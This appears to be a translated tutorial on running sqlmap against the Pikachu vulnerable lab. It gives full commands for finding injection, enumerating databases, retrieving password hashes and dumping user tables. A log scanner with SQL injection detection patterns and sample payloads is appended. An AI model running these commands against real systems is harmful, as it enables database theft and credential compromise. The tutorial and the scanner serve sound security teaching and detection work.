Sqlmap tutorial (II) practical skills I

2022-07-05 06:06:00 A τθ

1. Detecting injection

Test whether a GET parameter in the URL is injectable:

-u  The URL to test.
""  Double quotes pass the URL to sqlmap as a single string.
--dbms  Specify the back-end database engine of the target.
-v  Set the output verbosity level, here 1.
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1
Once the command is entered, sqlmap runs its injection tests automatically, but it stops at several prompts that have to be confirmed in the terminal. With --batch it takes the default answer to every prompt, so no interactive confirmation is needed.
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 --batch

2. Getting sensitive information

Once injection is confirmed, use the following options to retrieve sensitive information:

--current-user  The user the connection to the database runs as;
--current-db  The current database;
--dbs  List all databases;
--is-dba  Whether the current user has root privileges;
--passwords  Get the passwords of the database users.
With --passwords, when sqlmap finds hashed passwords it asks whether to crack the hashes; if you do, choose a suitable dictionary.
Example:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 --batch

3. Getting the tables

Once you know the current database, you can list the tables in it.

-D  Specify the database;
--tables  List all tables.
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu --tables

4. Getting the columns of a table

List all columns of a table.

-T  Specify the table;
--columns  List the columns.
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns

5. Getting the data

--dump  Dump the full contents of the table;
--dump -C "username,password"  Dump only the contents of the listed columns.

Dump the contents of every column of the specified table:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns --dump

Dump the contents of specified columns of the specified table:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users -C "id,username,password" --dump

6. Getting a specified number of entries

Get the total number of entries:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --count

Dump only a specified range of entries:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --dump --start 2 --stop 3

7. Deleting the cached session file

Option: --flush-session
If you do not want to reuse the session file cached from earlier runs against this target, use this option. It clears the previous session and tests the target again.
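
Seen from the target's side, the runs shown in this tutorial leave traces in the web server's access log. The following is an added example, not part of the original tutorial: it scans access-log lines for sqlmap's default User-Agent and for injection payloads in query parameters such as name. It assumes the "combined" log format; the sample lines are constructed, and the names scan and PAYLOAD_RULES are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in "combined" format; not real traffic.
SAMPLE_LOG = '''\
192.168.0.20 - - [05/Jul/2022:06:00:01 +0800] "GET /06/vul/sqli/sqli_str.php?name=1&submit=1 HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.0.66 - - [05/Jul/2022:06:01:10 +0800] "GET /06/vul/sqli/sqli_str.php?name=1&submit=1 HTTP/1.1" 200 3301 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"
192.168.0.66 - - [05/Jul/2022:06:01:12 +0800] "GET /06/vul/sqli/sqli_str.php?name=1%27%20AND%20SLEEP%285%29--%20-&submit=1 HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.0.66 - - [05/Jul/2022:06:01:15 +0800] "GET /06/vul/sqli/sqli_str.php?name=1%27+UNION+ALL+SELECT+NULL%2Ctable_name+FROM+information_schema.tables--+-&submit=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Captures: client IP, request target, User-Agent.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Hypothetical rule set: SQL fragments that do not belong in a name/search field.
PAYLOAD_RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-delay": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
}

def scan(log_text):
    """Return (line number, client IP, reasons) for every suspicious request."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, ua = m.groups()
        reasons = []
        if ua.lower().startswith("sqlmap/"):  # sqlmap's default User-Agent
            reasons.append("ua:sqlmap")
        # parse_qsl URL-decodes values, so encoded payloads are matched too.
        query = urlsplit(target).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            for rule, rx in PAYLOAD_RULES.items():
                if rx.search(value):
                    reasons.append(f"{key}:{rule}")
        if reasons:
            findings.append((n, ip, reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The User-Agent is set by the client, so the payload rules are the more durable signal. Such alerts only report attempts; the parameter stops being injectable when the page builds its query with bound parameters.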